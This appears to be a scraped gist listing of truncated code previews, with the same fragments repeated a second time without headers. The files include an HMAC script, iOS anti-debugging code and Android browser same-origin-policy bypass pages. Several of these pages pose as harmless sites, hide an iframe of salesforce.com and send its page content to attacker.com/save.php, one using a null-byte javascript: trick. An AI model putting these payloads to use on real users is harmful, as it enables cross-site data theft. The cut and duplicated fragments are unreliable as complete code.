Aung Khant yehgdotnet

## gist:ee3f91516fb05468d226
#!/usr/bin/env python

import base64
import hmac
import hashlib

string = raw_input("Enter string to encode: ")
key = raw_input("Enter key: ")

hash = hmac.new(key, string, hashlib.sha1).digest()

## bashpipe.go
package main

import (
        "bytes"
        "io"
        "log"
        "os"
        "os/exec"
)

## tlds
ac
ad
ae
af
ag
ai
al
am
an
ao

## iosdebugdetect.cpp
// Build on OS X with:
// clang debugdetect.cpp -o debugdetect -arch armv7 -isysroot /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk/ -miphoneos-version-min=7
#import <dlfcn.h>
#import <sys/types.h>
#import <stdio.h>
typedef int (*ptrace_ptr_t)(int _request, pid_t _pid, caddr_t _addr, int _data);
void disable_dbg() {
  ptrace_ptr_t ptrace_ptr = (ptrace_ptr_t)dlsym(RTLD_SELF, "ptrace");
  ptrace_ptr(31, 0, 0, 0); // PTRACE_DENY_ATTACH = 31
}

## catchredir.m
// Compile with:
// clang catchredir.m -o catchredir -arch armv7 -isysroot /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk/ -miphoneos-version-min=7 -framework Foundation
#import <Foundation/Foundation.h>
#import <stdio.h>
#import <objc/runtime.h>

@interface UrlConnection : NSObject
@property (strong) NSString *url;
- (void)connect;
@end

## AndroidWebViewRedirect.html
<html><head><script src="Spec.js/lib/Spec.js"></script></head>
<body>
<script>
	var spec = new Spec();
	if (spec.isDeviceDetected() && spec.getOS() == "Android" &&
			parseFloat(spec.getOSVersion()) < 4.2) {
		var iframe = document.createElement('iframe');
		iframe.style.display="none";
		iframe.src = "http://attacker.com:8080";
		document.body.appendChild(iframe);

## AndroidSOPTest.html
<html><head></head>
<body>
This is just a normal website...
<iframe id="if" name="test" height="0" width="0" src="http://www.salesforce.com"></iframe>
<script>
document.getElementById("if").style.visibility="hidden";
window.open("javascript:
	var i=new Image();
	i.src='http://attacker.com/save.php?'+document.body.innerHTML;
	document.body.appendChild(i);

## AndroidSOPBypass.html
<html><head></head>
<body>
This is just a normal website...
<iframe id="if" name="test" height="0" width="0" src="http://www.salesforce.com"></iframe>
<script>
document.getElementById("if").style.visibility="hidden";
window.open("\u0000javascript:
	var i=new Image();
	i.src='http://attacker.com/save.php?'+document.body.innerHTML;
	document.body.appendChild(i);

## MetasploitSOPBypass.html
<html><head><script src="Spec.js/lib/Spec.js"></script></head>
<body>
This is a normal website. Look at these pictures of cats...
<script>
	var spec = new Spec();
	if (spec.isDeviceDetected() && spec.getOS() == "Android"
			&& spec.getBrowser != "Chrome"
			&& parseFloat(spec.getOSVersion()) < 4.4) {
		var iframe = document.createElement('iframe');
		iframe.style.display="none";

## JSONUtil.java
// BSD License (http://lemurproject.org/galago-license)
package org.lemurproject.galago.utility.json;

public class JSONUtil {
  public static String escape(String input) {
    StringBuilder output = new StringBuilder();

    for(int i=0; i<input.length(); i++) {
      char ch = input.charAt(i);
      int chx = (int) ch;
	#!/usr/bin/env python

	import base64
	import hmac
	import hashlib

	string = raw_input("Enter string to encode: ")
	key = raw_input("Enter key: ")

	hash = hmac.new(key, string, hashlib.sha1).digest()
	// Build on OS X with:
	// clang debugdetect.cpp -o debugdetect -arch armv7 -isysroot /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk/ -miphoneos-version-min=7
	#import <dlfcn.h>
	#import <sys/types.h>
	#import <stdio.h>
	typedef int (*ptrace_ptr_t)(int _request, pid_t _pid, caddr_t _addr, int _data);
	void disable_dbg() {
	ptrace_ptr_t ptrace_ptr = (ptrace_ptr_t)dlsym(RTLD_SELF, "ptrace");
	ptrace_ptr(31, 0, 0, 0); // PTRACE_DENY_ATTACH = 31
	}
	// Compile with:
	// clang catchredir.m -o catchredir -arch armv7 -isysroot /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk/ -miphoneos-version-min=7 -framework Foundation
	#import <Foundation/Foundation.h>
	#import <stdio.h>
	#import <objc/runtime.h>

	@interface UrlConnection : NSObject
	@property (strong) NSString *url;
	- (void)connect;
	@end
	<html><head><script src="Spec.js/lib/Spec.js"></script></head>
	<body>
	<script>
	var spec = new Spec();
	if (spec.isDeviceDetected() && spec.getOS() == "Android" &&
	parseFloat(spec.getOSVersion()) < 4.2) {
	var iframe = document.createElement('iframe');
	iframe.style.display="none";
	iframe.src = "http://attacker.com:8080";
	document.body.appendChild(iframe);
	<html><head></head>
	<body>
	This is just a normal website...
	<iframe id="if" name="test" height="0" width="0" src="http://www.salesforce.com"></iframe>
	<script>
	document.getElementById("if").style.visibility="hidden";
	window.open("javascript:
	var i=new Image();
	i.src='http://attacker.com/save.php?'+document.body.innerHTML;
	document.body.appendChild(i);
	<html><head><script src="Spec.js/lib/Spec.js"></script></head>
	<body>
	This is a normal website. Look at these pictures of cats...
	<script>
	var spec = new Spec();
	if (spec.isDeviceDetected() && spec.getOS() == "Android"
	&& spec.getBrowser != "Chrome"
	&& parseFloat(spec.getOSVersion()) < 4.4) {
	var iframe = document.createElement('iframe');
	iframe.style.display="none";
	// BSD License (http://lemurproject.org/galago-license)
	package org.lemurproject.galago.utility.json;

	public class JSONUtil {
	public static String escape(String input) {
	StringBuilder output = new StringBuilder();

	for(int i=0; i<input.length(); i++) {
	char ch = input.charAt(i);
	int chx = (int) ch;